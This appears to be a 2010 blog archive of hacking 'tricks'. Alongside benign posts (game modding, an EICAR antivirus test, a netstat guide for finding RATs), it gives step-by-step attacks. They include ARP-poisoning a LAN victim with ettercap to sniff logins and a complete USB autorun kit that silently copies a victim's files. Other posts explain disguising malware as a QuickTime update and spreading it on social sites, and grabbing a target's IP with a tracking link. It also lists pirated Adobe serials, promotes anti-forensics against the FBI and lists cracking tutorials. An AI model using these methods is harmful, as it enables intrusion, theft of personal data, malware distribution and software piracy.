Tuesday, August 24, 2010

How to Become a Game Master

Everybody likes video games, and the best ones have a fair share of creative geniuses who want to develop their games or just want to mod their favorite one for a richer gaming experience. This time, I will be specifying some great tools that you can use for modifying and hacking your favorite video games.

http://2.bp.blogspot.com/_F7GuXCzPQdY/TGgGon4p-yI/AAAAAAAAESI/G_gEZO1J67Y/s1600/gaming.jpeg
1. jRipper [DOWNLOAD]

jRipper is a tool developed primarily to open any kind of file you might find in games, not just game archives, making is possible to edit of games. jRipper Features:
  • Supports games from PC platforms (soon XBOX and PSX)
  • Extracts files from different game archives
  • Preview of images (12+ formats)
  • Advanced text editor, with Syntax Coloring
  • Vista Inspired! interface
  • View archive contents as a table
  • Game Modding Tools included
  • Advanced BINK Player (.bik)

2. ArtMoney Special Edition [DOWNLOAD]

ArtMoney can make a troublesome game easier to win by helping you find the memory address where a desired quantity (like amount of money) is located so you can change that quantity. In spite of its title, ArtMoney actually allows you to change any quantity specified in a game, whether it be dollars, bullets, swords, or health points.

3. Game Audio Player [DOWNLOAD]

Have you ever wanted to play your favorite games music from your favorite PC games but you cant find any files which are supported by media players? Well now you can play all your favorite game soundtracks and even convert them to mp3 & wav files! This tool is a must for dedicated gamers! The following is what GAP can do:

1) Searching various games resource files for various audio files (music/sfx/speech)
2) Extracting found files "as is" and converting them to WAVs
3) Playing found/added files with seeking and other features
4) Extracting any files from various resource archives

4. Cheat Engine [DOWNLOAD]

Cheat Engine is a great memory editor, allowing you to find memory addresses and edit their variables, allowing you to cheat in game

5. Magic Trainer Creator [DOWNLOAD]

Make you own game trainers! This tool can search the memory of games and generate trainers, editors and patches.

6. Trainer Maker Kit [DOWNLOAD]

Another great tool to enable you to make your own game trainers. Includes a drag and drop feature, image, window, shape, scrolling text and heaps more! Includes a calculator and converter. It has the same quality as commercial software!

7. Trainer Creation Kit [DOWNLOAD]

Trainer Creation Kit makes it really easy to create powerful trainers for your favorite games. Trainer Creation Kit can generate very small size trainers.

8. Cheat Finder [DOWNLOAD]

This is a cool memory utility that has most standard features of a game hacking tool. Also has some special features such as "energy bar" search.

9. MemHack [DOWNLOAD]

MemHack will cheat in your game while the game is running. You can edit energy, ammo, resources etc. You can also create trainers from MemHack.

10. Creating A Good Looking Trainer Tutorial [DOWNLOAD]

Provides information and tools on creating a visually good looking trainer.

How to Watch Videos Faster On Firefox

Hi there. Here i want to show you a cool trick to watch flash videos faster on Firefox.

1. Type about:config in the address bar and press Enter

http://3.bp.blogspot.com/_F7GuXCzPQdY/THHOeXOej4I/AAAAAAAAEUg/FSt4fQT9Bs0/s1600/f_1.png
2. Use the filter box to find the setting browser.sessionstore.interval

http://1.bp.blogspot.com/_F7GuXCzPQdY/THHPQffsgRI/AAAAAAAAEUw/HFE6TpMNsK8/s1600/f_2.png
3. Edit the default value 10000 (10 seconds in million seconds) to 180000 which is 3 min.

http://3.bp.blogspot.com/_F7GuXCzPQdY/THHPqePuxRI/AAAAAAAAEU4/qOzeSHu8XNE/s1600/f_3.png
How does the tweak work?

Firefox takes snapshots of your browser every 10 sec to restore if Firefox crashes, but slows flash too, so this is a slight compromise for fast videos.

How to Know If You Are infected With RATs or Keyloggers

In this post i am going to show you how to find out when you are infected with a RAT or Keylogger, without using any complex tools. Now i believe most of you might know that you need to have an internet connection to make a RAT or a Keylogger work, which would mean, if you are not connected to internet, you don't have to worry about being infected with RAT or Keylogger. Ok, so for those who have internet connection and think they are being infected with a Trojan, here is a little guide that can solve your problem.

1. Now every program has their own process which can be seen on task manager. So the first thing to do is to find out which process the Trojan is being attached to. If you see some unknown process search that on google. A good hacker will always makes sure he hides its process with a Windows based Process, for eg. svchost.exe or something like that.

2. If you cant find, then the next thing you can do is use cmd (to open cmd prompt, Click on Start--->Accessories-->Command prompt).

3. Once Command Prompt is opened, use this command: netstat -an |find /i "listening"

Note: The NETSTAT command will show you whatever ports are open or in use, but it is NOT a port scanning tool!

Now we wonder What this Command does? This command will show all the opening ports. Now check for any unknown port.

4. You can skip step 3 if you want, and can do this instead.

Open command prompt and type netstat -b

http://1.bp.blogspot.com/_F7GuXCzPQdY/THHUkgw74iI/AAAAAAAAEVA/9V5Bib9T6-w/s1600/netstat+-b.jpeg
Now this command will show you the active connections with the process with their PID (Process Identifier) and also the packets.
Look out for SYN Packets and the Foreign address its been connecting with , check the process its been associated with, check the ports also. If you find that its connecting to some unknown ports, then you can say you have been backdoored.

5. Go to your task manager. On the top of it, click on View---> select Column---> Tick on PID (Process Identifier).
Match the suspicious Process with the Processes In task manager, check PID also.

http://2.bp.blogspot.com/_F7GuXCzPQdY/THHVGUIBXzI/AAAAAAAAEVI/AXJ07ab9fwM/s1600/netstat-b%2Btaskmgr.jpeg
Now most of the RATs resides on Start up. How to delete them from start up?

a) Go to regedit ---> HKLM\Software\Microsoft\Windows\Current version\Run
On the Right hand side, check for the process name which you find on step 4. if its not their. Check at
HKCU\Software\Microsoft\Windows\Current Version\Run
OR
Open Cmd prompt & type start msconfig. Go to Startup tab, you can check the startup process there.

http://4.bp.blogspot.com/_F7GuXCzPQdY/THHVX_NdaxI/AAAAAAAAEVQ/DJDMlq5Ku5g/s1600/startup.jpeg
I hope This Tutorial was easy and comprehensive.

Adobe Master Collection CS5 Serial Numbers

Adobe Creative Suite (CS) is a collection of graphic design, video editing, and web development applications made by Adobe Systems. The collection consists of Adobe's applications (e.g., Photoshop, Acrobat, InDesign), that are based on various technologies (e.g., PostScript, PDF, Flash).

 This image has been resized. Click here to view the full image.




http://1.bp.blogspot.com/_F7GuXCzPQdY/THIHSRgT3PI/AAAAAAAAEV4/lC6hU2wf-MY/s1600/Adobe+Creative+Suite.png
Adobe Master Collection CS5 Serial Numbers:

1325-1263-0034-6192-0472-9778
1325-1157-8207-7707-9798-6532
1325-1319-1010-6434-1955-4619
1325-1870-2938-9873-5356-2624
1325-1174-1834-0596-8505-0323
1325-1271-7898-3364-1803-3655
1325-1823-6020-0958-5549-2729
1325-1177-2533-5307-9327-8593
1325-1960-8746-4023-7312-2320
1325-1095-0854-7085-2679-7165


How to use them:

1.Install
2.Use a serial
3.Enjoy

How to Protect Your Computer from The FBI Forensics

When the FEDs want to investigate a computer after they arrest someone, most of the time they use a Microsoft tool called "Cofee" - Computer Online Forensic Evidence Extractor. And what it does is basically pull all your information of the computer, emails, passwords, history every thing!

Two hackers decided to make and release a tool they called "Decaf", basically to combat against Cofee. So the cop/fed would have 'Cofee' on a thumb drive and when they plug it into you computer, if you have Decaf setup, it will detect the cofee and lock everything down, so the FBI can't pull out any information from your computer.

DECAF v2 provides real-time monitoring of Microsoft COFEE signatures on USB devices, CD's, and in running applications.

http://1.bp.blogspot.com/_F7GuXCzPQdY/TGtYvUt20eI/AAAAAAAAETI/YmYaTFfAmZs/s1600/DECAF.png
Download DECAF v.2

So if your paranoid about FEDs have some Decaf ;)

Check Effectiveness of your Antivirus

 http://computersafetytips.files.wordpress.com/2010/03/antivirus.gif
Have you ever wondered that is your Antivirus working properly? Do you want to ensure that your antivirus works properly? So don't worry we have got a perfect working solution which will make you to Check Effectiveness of your Antivirus.The test for this purpose is called EICAR Test. This test is used by many antivirus developers to find whether there antivirus is working properly or not.Here is a step-by-step procedure to test your antivirus:


1. Open a new text document, Click start menu goto run and type wordpad or notepad


Type there the following code and save it as virustestfile.com


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


2. Now run Antivirus scan

If your antivirus detects it as a virus then your Antivirus is working properly and If it does not detect it as a virus then your antivirus is not effective and you need to look for alternatives

Beginners Hacking book

I am very happy to tell you that the book of the person who i used to follow "A Beginners guide to Ethical Hacking" has just launched. He have dedicated this book completely to beginners who want to become hackers.





How will the information in the book affect me?

  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans,worms, Adwares etc
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks

And Much more...

Reality about Password Hacking softwares


You might have heard about some paid password hacking softwares which claim to hack a password on entering the email account.But in reality all those softwares are fake.If you believe what they say then you are just wasting your time and money.These all softwares are fake.If there exists such a software, will there be any security on web. And all expert engineers at Google, Yahoo and other services are not mad. They are all engaged in ensuring security of their customers ie email account owners. So, no such software exists.
So stop wasting your time and money on these foolish softwares and services and learn real Ethical Hacking methods which hackers use to access email accounts.

 For Download Link visit the following site

Ethical Hacking Book

Hack the Hacker with Bin text

You Might have heard about some programs such as Hotmail Hacker of Gmail Hacker. What Hackers do is just to fool the victim by telling him that these softwares are Password Hacking Softwares and asks him to Enter his Email and enter all information including his Hotmail ID and Password and Gmail account you want to Hack Email and it will show his/her Hotmail account password but thats not the case instead the victim will end in loosing his account password. Here is what a Hotmail Hacker Looks like:






























  Basically Bin Text is basically a text extractor software used to extract text from application or any file. Here is How you can Extract the Hackers Gmail account Password with Bin Text:

1. First of all I opened Bin Text

2. Unzip the downloaded Bin Text software in a separate folder.

3. Open Bin Text and browse for the location where you have kept the Hotmail Hacker.exe file that the hacker has sent you.Now Hit Go.

4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.

5. Now scroll down till you find email address and password as I have shown in the screen shot above.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNyeMUIoxAOGxcTgzyY_TrMH5qP9fsrIsnbq7pTPRYylqM-hAiVhZxZHgUBZOwYtWsvv3mzvSoZIA7JZIuGOgkeGsF4hxhB_J_x8CTpBw0zLXGuAPixeMnLpgRu_ecgW7TknZ055mQjTs/s1600/hhhh.jpg


Monday, August 23, 2010

Hack any computer in LAN and get all his logins

What we need
1. Backtrack 4 (i recommend it but not compulsory)
2.If you donot have backtrack then you can download and run ettercap from google ..
3. Common sense

Lets start

Question comes whats ettercap ?

Ettercap is a suite for man in the middle attacks on LAN.,DNS spoofing etc..

What we are gonna do ?
We are going to perform man in the middle attacks using a basic method called arp poisoning..

Now if you donot know what is arp poisioning then i suggest you google it :) before moving forward


So now we know what the hell is arp poisoning now we gonna see what actually happens when we do arp poisoning
What actually happens.. ?

Before ARP poisoning


[Image: 1zxwf2x.jpg]

After poisoning


[Image: s63qsl.jpg]
now the Method USING BACKTRACK 4 :

First open Ettercap in graphical mode using :
In konsole
# ettercap -G

[Image: b5id5i.jpg]

Select the sniff mode to sniff all the host connected on a LAN

Sniff → Unified sniffing


and
Scan for host inside your network using
Hosts → Scan

After scan is complete we go and check the host list we got.

[Image: nbdkpy.jpg]
Now we see the MAC and IP addresses of the hosts inside the window
( Hosts → Hosts List)

These are the machines which are connected in a LAN .
From this list we need to select the machines we need to poison.

Now we choose to ARP poison the machine 192.168.1.2 (in my case) ..you can use other machines from your host list whom you want to poison and remember that the IP of the router will always be 192.168.1.1.

Next
Highlight the line containing 192.168.1.1 and click on the "target 1" button.
(It means this entry will be poisoned in the victim’s arp table so that all that victim uses on internet will first go through us.)

Highlight the line containing 192.168.1.2(in my case) it’s the victims IP address and click on the "target 2" button.

[Image: f0cg1v.jpg]

To start the ARP poisoning:
Go to

Mitm → Arp poisoning
[Image: 11s1co9.jpg]
and start the sniffer to see the activities and its done ! whatever address victim will visit you will be able to see it :)

Method using Windows :
Download ettercap for windows and rest of the steps are same.
Note : ettercap in BT is not in GUI mode you may need to install GUI mode if you don't know how to use non GUI one.
Use "apt -get install ettercap-gtk"


If you have prblems seeing the images then see them here
http://img121.imageshack.us/gal.php?g=54830965.jpg

How To Make .mov Open Your Virus

Tools Needed
NotePad++
And My .Mov File
WinRar

Download Links
http://adf.ly/4BxY (notepad++)
http://adf.ly/4Bzs (basefile 4mb + Quicktime .ico) <--- MUST HAVE
http://adf.ly/4C1Z (WinRar)

How To Make It Open Your Link

Step 1.

Download The BaseFile And Notepad++ if Dont Have And Extract

Step 2.

Right Click "BaseFile 4mb.mov" And Click "Edit With Notepad++"

Step 3.

When In Notepad++ Hit CTRL+F A Menu Should Pop Up Looking Like This
[Image: 15qvu42.jpg]
In Find Search Google Then Replace With Your Direct Download Link

Step 4.

If You Don't Got Direct Download Link Go To http://adf.ly/4C5J And Upload File And If Link Cuts Off And Fails To Open Link Go To http://adf.ly/4C5L To Shrink Link And Put In The .mov File

Tips

To Get More People To Download Your Fake Update Name It Like
"QuickTime_Update_KB802343.exe" And Use The Icon In Folder Provided To Change Virus To Look Even More Fake Also Have Fud Virus Helps.

Ideas For Spreading

Upload Your Renamed .Mov File And Spread On Omegle or Facebook etc.
Or Use p2p or torrents to Spread It.

How to view Removed Videos on Youtube

Have you ever found an Interesting Video on Youtube but when you try to view that video you find out that the video has been removed by Youtube due to terms of Use Violation. According to the policy of Youtube, it has a right to remove any video from public viewing if it is found to be violating the terms and conditions of Youtube. But now I will show you how to view that video.

[Image: This-video-has-been-removed.jpg]

Just follow the steps given bellow and watch your favorite videos:

Go to the page where you got the error message that this video has been removed.
click on the Video’s Publisher, that is- the Uploader of that video.
click on uploads
Find the Video which he uploaded and is now removed
Click on it
Hurray!!!!!! You have got access to watch the removed Video
Now Sometimes you can open the video in New Tab and it wont show the message that the video is removed due to violating the terms.. Sometimes it may show..

Hope this worked for you

Get Someone's IP address very easily

First goto

Code:
http://s33.net/rec/create.php
[Image: ivz7sg.jpg]
Just have the "Redirect URL" to google.
Remember your Password.

Now click "Submit" if you did everything right your page should look like this

[Image: 2lcmlh3.png]

Save the link it gave you. Same like the link in the red box in above image. Not the link in above image, Link that you got after submission. Note down your linkID. ( for eg:: in the above link 3i8y9 is the link ID). Copy the linkID from the link you got.

Now goto

Code:

http://s33.net/rec/view.php
you will get a page with linkid and password text boxes.
http://webtrickz.com/wp-content/uploads/2009/03/image18.png

Type the linkid and password.
Click Submit.

Now that your logged in, Time to send your link. Send the link to the target.

After they clicked the link,  refresh your page (It should be on http://s33.net/rec/view.php, Go there if your not on it)
[Image: 358yww7.png]
And you should have there IP, Simple?

Shutdown your PC by sending a mail

In this tutorial, I am going to teach you how you can control your computer’s basic function using Microsoft Outlook and your Cell Phone Network. For this tutorial I am demonstrating how a user can shutdown, restart, hibernate their computer, just by sending an email from their phone.

To make this happen, all you need is Microsoft Outlook installed on the PC which you want to control from your cell phone

Now let’s begin with the tutorial.

First, you need the batch files to perform the Shutdown, Hibernate operation.

For example,

shutdown -r -t 10 -c “shutting down”

Copy this code and paste it in notepad, save it as shutdown.bat

Now open up Microsoft Outlook. I am assuming that you have already configured it for your Email and I am not going to teach you about setting mail in Microsoft Outlook. Now we will need to make it so that Outlook checks your inbox about every minute.

You can do this by going to Tools>Options. Then click on Mail Setup tab, and then, the Send/Receive button.
[Image: a6.jpg]

Make sure that the Schedule an automatic send/receive every… box is checked, and set the number of minutes to 1 or anytime you may like. Now you may close all of these dialog boxes.

[Image: b5.jpg]

Now go to Tools>Rules and Alerts. Click on E-mail Rules tab. In new window select Check messages when they arrive and click Next.

[Image: d4.jpg]

Now in next page, check on, on this machine only and with specific words in the subject.

After checking these two values, click on specific words underlined.

[Image: g2.jpg]

Search Text window will open, in the input field type the command that shuts down the PC. You can use any commands. For prevention of accidental execution I kept %shutdown% as a command. Click on Add button after you are done and click on OK.

[Image: h3.jpg]

Now click on Next.

In the next window check mark on start application. In the lower screen, click on application link.

[Image: i3.jpg]

Now you’ll be welcomed to your familiar file open window. Load all files. And select the batch file that you’ve created to shutdown your PC.

[Image: j2.jpg]


If everything went well you’ll see the screen similar to below:

[Image: k1.jpg]

Click on Next, again click on next (don’t choose any things in this step). And finally click on Finish button.

[Image: l1.jpg]

You’ll have %shutdown% alert shown in the E-mail Rules tab.

[Image: m.jpg]

Now, when you send a message from your phone to your e-mail address with the Subject %shutdown% your computer will trigger shutdown.bat file and instantly executes the command in that batch file finally leading to shutdown the PC.

You can use any batch file to execute any command.

Hope you loved this tutorial.

Wednesday, August 18, 2010

Crack the WINRAR password

Cracking RAR Passwords

Hello! Today I'll be showing you how to crack RAR Passwords using bruteforce! 

What's Brute Force?


Brute force attack is a strategy used to break the encryption of data. It involves traversing the search space of possible keys until the correct key is found.


What will you need?


WinRar -- http://www.baixaki.com.br/download/winrar.htm
Advanced Archive Password Recovery 4.53 -- 

Serial:
ARCHPR-TBHW5SSMYGQS-GNGD56ZSWN7NZ4UG


If you want a full version of the program you'll have to download the version "Pro 4.00"



Download and install them!


[Image: 98wms2.jpg]


First of all you'll open "Advanced Archive Password Recovery". You should get a screen like this! Check all those boxes!


[Image: 4zyydv.jpg]


Then go to the lenght tab and edit the "Max Lenght" to 20, click open and choose the protected file!


[Image: 1ta0cg.jpg]
[Image: j77xbc.jpg]


Then you should see a progress bar loading and when the program finds the correct password this is how it looks like!


[Image: 36393068.png]

Steal the files from your friends computer (without any software)

Today i am posting a way to steal secret file from your friends computer without any software.


STEP 1

Open Notepad and copy-paste the following lines.
Instead of using your normal notepad use notepad++ (optional only) (download notepad++ here) because Cmd prompt processing will be visible if you used normal notepad. For testing in your computer you can use normal notepad.

Quote:[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

STEP 2

Open Notepad again and copy-paste the following lines

Quote:@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls

Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path "%USERPROFILE%\pictures" – is the target.
The second file path "%drive%\all\My pics" – is the destination.

STEP 3

Open Notepad once again and copy-paste the following line 

Quote:CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4

Open Notepad one last time and copy-paste the following line.

Quote:wscript.exe \invisible.vbs file.bat

Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed.
This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

Tuesday, August 17, 2010

1000 + Hacking tutorials ( Best Tutorials for Beginners)

 Hey ppls,
           Here is the thousands of hacking tutorials that one must have,

Create Bootable XP SP integrated CD,Create One-click Shutdown And Reboot Shortcuts.txt Creating a Board aka Forum on your own PC !.rtf
Creating Universal Ghost Usb Boot Disk And Cd.txt
Data Capacity of CDs [Tutorial].txt ,Debug, Learn how crack windows.txt,Delete An undeletable File.txt,Delete Files From The Recent File List In Windows.txt,Digital Camera Guide.txt
Digital Faq -learn Everything About Digital, Capture, Edit and Burning and more.txt 2.20 kB
Digital Photo Id Cards, Greate Info.txt 2.88 kB
Direct Link To Any Page You Want To In Hotmail.txt 1.95 kB
Directx Explained.txt 7.66 kB
Disable Compression On Xp, NTFS partition, Disk Cleanup.txt 0.43 kB
Disable The Send Error Report, to Microsoft.txt 0.51 kB
Disable Windows Logo Key.txt 0.62 kB
Discover New Music You'll Probably Love.txt 1.08 kB
Download Free Music legally,, legally.txt 3.24 kB
Download from a paypal site without paying a penny!.txt 0.95 kB
Download From Ftpz, Using Ftp Search Sitez.txt 8.12 kB
Download Mp3's Without Using Filesharing.txt 0.69 kB
Download Music And Video With ,edia Player9, quick and easy!.txt 0.66 kB
Download Timeframes.txt 0.33 kB
1.39 kB
Dual Boot After The Fact.txt 1.37 kB
Dvd Copying-ripping Definitions.txt 1.25 kB
DVD Regions Information.txt 3.84 kB
Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt 0.94 kB
Easily Disconnect-reconnect From Broadband.txt 0.30 kB
Easily Find Serial Numbers On Google.., easy to do and works like a charm..txt 1.40 kB
Ebay Hackcracktip.txt 0.50 kB
General Keyboard Shortcuts.txt 7.54 kB
Get In Windows 2000 As Administrator.txt 0.39 kB
Get the Most Out of Your DVD Recorder.txt 11.25 kB
Get The Music You Want To Hear.txt 0.90 kB
Get unlimited bandwidth from your host for free.txt 2.88 kB
Getting A 1gb Yahoo China Account.txt 0.98 kB
Getting Counter-strike Source To Work.txt 3.36 kB
getting movies, mp3,games using google.txt 0.75 kB
Getting older programs to run on Windows XP.txt 2.96 kB
Getting started with Linux for nOObs!.txt 17.37 kB
Go to Windows updates anonymously.txt 0.40 kB
Google Crack Search.txt 0.14 kB
Google secrets.txt 0.98 kB
Google Tips & Tricks, (utilizing search engine).txt 5.81 kB
Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt 2.45 kB
Guide For Getting Free Stuff.txt 10.33 kB
Guide to IIS Exploitation.txt 27.77 kB
Guide to Slipstreaming Service Pack 2.txt 2.82 kB
Hard drive Gone Bad.txt 5.55 kB
Hardware Firewall.txt 3.02 kB
How To Add An Option To Print, the Contents of a Folder!.txt 1.47 kB
How To Add Your Own Windows Tips.txt 0.48 kB
How to Back Up the Registry.txt 0.76 kB
How To Backup Ps2 Games.txt 7.71 kB
HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt 1.51 kB
How To Block Websties Without Software, block websites.txt 0.64 kB
How To Boot Xp Faster (updated).txt 1.66 kB
How to build a black box.txt 7.79 kB
how to burn quicker in windows xp.txt 0.28 kB
How to Bypass BIOS Passwords.txt 9.05 kB
How To Bypass Web Filters, tutorial.txt 6.20 kB
HOW TO CAPTURE STREAMING MEDIA.txt 1.68 kB
How To Change A Cmos Battery.txt 3.18 kB
How to change the serial number used in Windows XP, Valid for XP Corporate.txt 1.11 kB
How To Change Thumbnail Size And Quality.txt 0.90 kB
How to clear Bios info 2.txt 23.55 kB
How to clear Bios info.txt 11.75 kB
How To Convert File System, fat - fat32 to ntfs.txt 0.52 kB
How To Copy A Dvd Which Will Play On A X Box.txt 1.01 kB
How to copy songs from your iPod to your PC.txt 1.40 kB
How To Customise Your start Button.txt 1.54 kB
How To Delete Those Persistent Nasty Files.txt 0.53 kB
How To Directly Go To Inbox, Write Msg, w Hotmail, no need for How to find MP3's real quickly.txt 0.35 kB
How To Find Serial Numbers On Google.txt 0.79 kB
How to fix corrupted files in XP.txt 1.48 kB
How to fix Windows Installer problem.txt 0.96 kB
How To Get A Free I-pod Or Flat Screen Tv, check it out.txt 6.62 kB
HOW TO GET ANY WINDOWS PASSWORD.txt 3.41 kB
How to Get someones ISP password, Get free internet.txt 2.65 kB
How To Get Top Ranking, Search Engines.txt 6.58 kB
How To Hack Windows Xp Admin Passwords.txt 2.52 kB
How to hack-change your Windows XP Boot Screen.txt 1.52 kB
how To Hide Yourself From Network Users!, And give access to only specific users!.txt 0.86 kB
How To Make An Animted Logo.txt 5.26 kB
How To Make Free Phone Calls.txt 2.29 kB
How to make key generators.txt 8.83 kB
How To Make Perfect Copies Of Maxis The Sims Discs, CloneCD Style!.txt 1.17 kB
How To Make XP Go Faster.txt 5.58 kB
How To make your own Radio Station 2.txt 3.26 kB
How To Make Your Own Radio Station.txt 1.58 kB
How to Remove DRM Protection for Video Files.txt 2.29 kB
How To Remove Ms Java Vm And Install Sun Java.txt 0.05 kB
How To Remove Signin Details Of Msn Passport.txt 1.04 kB
How To Remove The Default Admin$ Shares.txt 1.03 kB
How to remove the Links folder in IE Favorites.txt 0.59 kB
How to Remove WinXP Splash and See Operations.txt 1.19 kB
How To Rename Extensions With Ease, with a Renamer.bat file!.txt 0.44 kB
How to Rename File Extensions.txt 3.11 kB
How To Rename Multiple Files In Winxp.txt 0.56 kB
How To Restrict Login Hours Allowed.txt 0.58 kB
How to safeguard your files when computer crashes.txt 2.94 kB
How to save Windows xp updates.txt 0.63 kB
how to search google for RAPIDSHARE links.txt 0.98 kB
How To See Hidden Files, Using Dos.txt 0.08 kB
How To Set search For All Files In Winxp.txt 0.71 kB
How to set up a http server running from you computer.txt 3.06 kB
How To Set Up A Proxy In Flashget, As Requested.txt 0.66 kB
How to set up a server with Apache , PHP , MySQL , Perl , phpMyAdmin.txt 8.77 kB
How To Set Up Direct Connect.txt 26.96 kB
HOW TO SET UP FTP SERVER.txt 1.79 kB
How To Set Up Proxies In Your Browser.txt 1.63 kB
How To Set Zone Alarm Settings!, Fix for ZA ports.txt 2.12 kB
How To Setup Your Own Dns (Domain Name Server).txt 6.97 kB
How To Speed Up A Slow Computer.txt 1.21 kB
How To Speed Up Http Requests On Internet Explorer, as above.txt 1.28 kB
How To Stop Spam.txt 8.05 kB
How to swear in all languages.txt 28.32 kB
How To Unload Cached Dll Files To Free Memory.txt 0.56 kB
How to Use and How to Chain Multiple Proxies!.txt 9.70 kB
How To Use File Compression In Windows Xp.txt 4.19 kB
How To Use Google To Download Mp3's, and applications.....txt 0.60 kB
How To Use Newsgroups.txt 0.56 kB
How To Use You Gmail With Msn Messenger.txt 0.37 kB
How-to Get Videos And Dvds Onto Your Sony PlayStation Portable (PSP) for free.txt 12.91 kB
HOWTO Change Windows XP Home to Windows XP Pro.txt 1.67 kB
Important Faqs For Sp2.txt 9.47 kB
Improve Doom 3's Performances!!, simple but efficient trick for every1.txt 4.22 kB
Improve your dialup modem preformance.txt 0.73 kB
Increase XP Folder Settings.txt 0.79 kB
Insert Your Serial For Office 2k, auto install office.txt 1.06 kB
Install A New Hard-disk.txt 5.16 kB
Install Xp From Dos.txt 0.84 kB
Installing Apache on Windows.txt 6.29 kB
Installing Gentoo Linux, Amazing step by step tutoria.txt 0.19 kB
Installing IIS On Windows Xp Pro.txt 3.04 kB
Installing Slackware Linux.txt 34.73 kB
Instructions For Removal Of Advertising In Msn Messenger.txt 2.59 kB
Ip Address Structure, Expilinatin OF IP Address {A short way}.txt 7.65 kB
Irc How To Downlaod From, How to downlaod from IRC.txt 3.95 kB
Irc Servers On nix, For people who want to start own IRC net.txt 0.48 kB
Keep Files Private.txt 1.51 kB
Keep Folders Hidden.txt 0.46 kB
Keyboard Shortcuts Result in Excel 2000 - Movement.txt 1.57 kB
Keyboard Shortcuts, Microsoft Word.txt 2.37 kB
Keyboard Shortcuts, must read.txt 3.72 kB
Kill Microsoft Instant Messenger.txt 0.28 kB
Lamination Tips, Its a Fast TUT......txt 1.98 kB
Leet Way To Get Your Ip In Windows Xp.txt 0.26 kB
Linking Your Xbox To Your Computer.txt 33.52 kB
Linux Howto's.txt 0.08 kB
List Of Sites Not To Go To.txt 4.32 kB
Little help for anonymous mailer.txt 1.56 kB
Lots Of Windows Xp Tips, Take A Look !.txt 12.43 kB
Lyrics With Google.txt 0.08 kB
Make A Autorun File For Ur Cd.txt 0.66 kB
Make A Batch File To Clean UR PC!!, All In One!!.txt 1.37 kB
Make A Roughly 16 Hour Video Dvd.txt 1.01 kB
Make Acrobat Reader 6 load faster.txt 0.42 kB
Make Dvd Iso From Suse 9.2 5 Cds Iso, Linux mode and Windows mode ISO creation.txt 7.41 kB
Make Mp3 Files Smaller Without Losing Quality.txt 0.73 kB
Make Your Own Ringtones For Mobile Phone, also logos, wallpaper, etc.txt 3.00 kB
Make Your Pc Faster, Guaranteed.txt 6.23 kB
MakeXPgoFaster.txt 5.74 kB
making a .cue file, in notepad.txt 0.53 kB
Making A .txt Executable Server.txt 1.60 kB
Making Bootable Floppy Disk to Boot into Windows.txt 4.82 kB
Making Cd Version Of Doom3 Into Dvd Version.txt 0.75 kB
Making Web Page Fonts Consistent and Uniform.txt 0.80 kB
Manage Saved Ie Passwords.txt 0.75 kB
Mastering The Windows XP Registry.txt 5.79 kB
Maximize Dial-up Modem Settings.txt 2.31 kB
Microsoft's Really Hidden Files, Reveled Hidden files.txt 33.95 kB
mIRC Not Just Another Chat Client, Download Anything You Want Almost.txt 4.37 kB
mIRCcommands.txt 10.10 kB
Misc Linux Tips & Tricks.txt 18.55 kB
Missing Administrator Account.txt 0.52 kB
Mobile Secret Codes.txt 31.09 kB
Modify .exe Files And Crack A Program.txt 3.06 kB
More Hacking/A beginners guide to Hacking UNIX.txt 5.61 kB
More Hacking/A Cracking Tutorial/C101-90.000 3.85 kB
More Hacking/A Cracking Tutorial/C101-90.001 32.32 kB
More Hacking/A Cracking Tutorial/C101-90.002 30.93 kB
More Hacking/A Cracking Tutorial/C101-90.003 14.75 kB
More Hacking/A Cracking Tutorial/C101-90.004 54.91 kB
More Hacking/A Cracking Tutorial/ED!SON.NFO 1.58 kB
More Hacking/A Guide to Internet Security- Becoming an Uebercracker.txt 8.56 kB
More Hacking/A Guide to the Easiest Hacking there is.txt 4.58 kB
More Hacking/A List Of Some OF The Most Useful UNIX Hacking Commands.htm 23.03 kB
More Hacking/A Small Guide to Hacking HOTMAIL.txt 3.02 kB
More Hacking/A UNIX Hacking Tutorial.txt 82.20 kB
More Hacking/Almost Everything You Ever Wanted To Know About Security (but.txt 47.52 kB
More Hacking/An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt 40.84 kB
More Hacking/An Introduction to Denial of Service.txt 44.78 kB
More Hacking/An Introduction to the Computer Underground.txt 17.03 kB
More Hacking/Basic Networking.txt 14.04 kB
More Hacking/BBS Crashing Techniques.txt 3.72 kB
More Hacking/BRUTE- A brute force approach to hacking Unix passwords.txt 3.31 kB
More Hacking/Closing the Net.txt 30.69 kB
